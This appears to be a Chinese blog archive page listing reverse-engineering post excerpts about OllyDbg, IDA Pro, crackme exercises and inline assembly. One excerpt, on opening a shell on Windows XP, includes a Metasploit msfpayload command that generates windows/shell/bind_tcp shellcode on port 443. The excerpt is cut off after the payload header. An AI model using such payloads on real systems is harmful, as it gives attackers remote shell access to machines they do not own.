逆向工程
feier7501
这个作者很懒,什么都没留下…
展开
-
OllyDBG 入门系列(二)-字串参考
http://www.pediy.com/kssd/pediy08/pediy8-421.htm上一篇是使用入门,现在我们开始正式进入破解。今天的目标程序是看雪兄《加密与解密》第一版附带光盘中的 crackmes.cjb.net 镜像打包中的 CFF Crackme #3,采用用户名/序列号保护方式。原版加了个 UPX 的壳。刚开始学破解先不涉及壳的问题,我们主要是熟悉用 OllyDB转载 2013-05-05 22:47:58 · 1039 阅读 · 0 评论 -
用ollydbg调试exe感想
仔细看了一下OllyDBG 入门系列(二)-字串参考,并且按照里面的步骤来做,感觉其实和在eclipse里面调试程序类似。在eclipse里面,要调试一个类,但是没有源代码,那就要反编译。而disassemble就类似于反编译,把高级语言写好的exe,disassemble一下,只不过是汇编语言,要有点汇编语言的基础才行。ollydbg和eclipse加断点、单步等调试,感觉也差不多。原创 2013-05-06 23:12:49 · 2824 阅读 · 0 评论 -
利用bt5和ollydbg来打开XP的shell
先产生shellcode:root@bt:~# msfpayload windows/shell/bind_tcp LPORT=443 C/* * windows/shell/bind_tcp - 298 bytes (stage 1) * http://www.metasploit.com * VERBOSE=false, LPORT=443, RHOST=, EXITFUNC=pr原创 2013-05-12 16:24:37 · 1849 阅读 · 0 评论 -
ollydbg的binary copy、binary paste、binary edit
用ollydbg打开随便一个exe文件,点击鼠标右键,选择“Edit”,然后很多选项,其中有三个分别是“Binary copy”、“Binary paste”、“Binary edit”。当点击“Binary copy”的时候,会复制当前区域的二进制,比如,我复制的区域是:CPU DisasmAddress Hex dump Command原创 2013-05-04 23:53:51 · 1083 阅读 · 0 评论 -
OllyDbg、IDA Pro联合调试
IDA Pro的版本是6.1,OllyDbg的版本是1.10。IDA Pro的菜单File->Produce file->Create MAP File产生map文件。下载loadmap插件,地址http://tuts4you.com/download.php?view.65,解压得到LoadMap.dll,放到OllyDbg的目录。打开OllyDbg,菜单Plugins->Loa原创 2013-08-19 21:07:53 · 4589 阅读 · 0 评论 -
C语言的函数返回值所存放的寄存器
#include int add(int a, int b){ return a + b;}int asm_compare_one(int a){ _asm { mov edx, a cmp edx, 1 je val1 xor eax,eax jmp val0val1: mov eax, 1val0: } //eax中存放返回值}int m原创 2013-08-24 21:59:26 · 8427 阅读 · 0 评论